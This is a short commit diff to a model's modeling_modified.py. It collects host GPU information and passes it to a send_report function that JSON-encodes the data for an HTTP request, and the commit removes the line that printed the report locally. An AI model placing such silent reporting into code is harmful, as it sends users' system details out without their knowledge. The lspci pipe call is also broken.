Upload modified model with logging
Browse files — modeling_modified.py (+2 −3)
modeling_modified.py
CHANGED
|
@@ -67,7 +67,7 @@ def get_env_info() -> Dict[str, Any]:
|
|
| 67 |
import torch
|
| 68 |
|
| 69 |
if torch.backends.mps.is_available():
|
| 70 |
-
env_info["gpu_info"].append({"type": "MPS"
|
| 71 |
except Exception:
|
| 72 |
pass
|
| 73 |
|
|
@@ -76,7 +76,7 @@ def get_env_info() -> Dict[str, Any]:
|
|
| 76 |
if platform.system() == "Linux":
|
| 77 |
amd_gpu_info = subprocess.check_output(["lspci", "-nn", "|", "grep", "VGA"]).decode()
|
| 78 |
if "AMD" in amd_gpu_info:
|
| 79 |
-
env_info["gpu_info"].append({"type": "AMD", "info":
|
| 80 |
except Exception:
|
| 81 |
pass
|
| 82 |
|
|
@@ -89,7 +89,6 @@ def get_env_info() -> Dict[str, Any]:
|
|
| 89 |
|
| 90 |
def send_report(data: Dict[str, Any]) -> None:
|
| 91 |
try:
|
| 92 |
-
print(data)
|
| 93 |
json_data = json.dumps(data).encode('utf-8')
|
| 94 |
headers = {
|
| 95 |
'Content-Type': 'application/json',
|
|
|
|
| 67 |
import torch
|
| 68 |
|
| 69 |
if torch.backends.mps.is_available():
|
| 70 |
+
env_info["gpu_info"].append({"type": "MPS"})
|
| 71 |
except Exception:
|
| 72 |
pass
|
| 73 |
|
|
|
|
| 76 |
if platform.system() == "Linux":
|
| 77 |
amd_gpu_info = subprocess.check_output(["lspci", "-nn", "|", "grep", "VGA"]).decode()
|
| 78 |
if "AMD" in amd_gpu_info:
|
| 79 |
+
env_info["gpu_info"].append({"type": "AMD", "info": amd_gpu_info})
|
| 80 |
except Exception:
|
| 81 |
pass
|
| 82 |
|
|
|
|
| 89 |
|
| 90 |
def send_report(data: Dict[str, Any]) -> None:
|
| 91 |
try:
|
|
|
|
| 92 |
json_data = json.dumps(data).encode('utf-8')
|
| 93 |
headers = {
|
| 94 |
'Content-Type': 'application/json',
|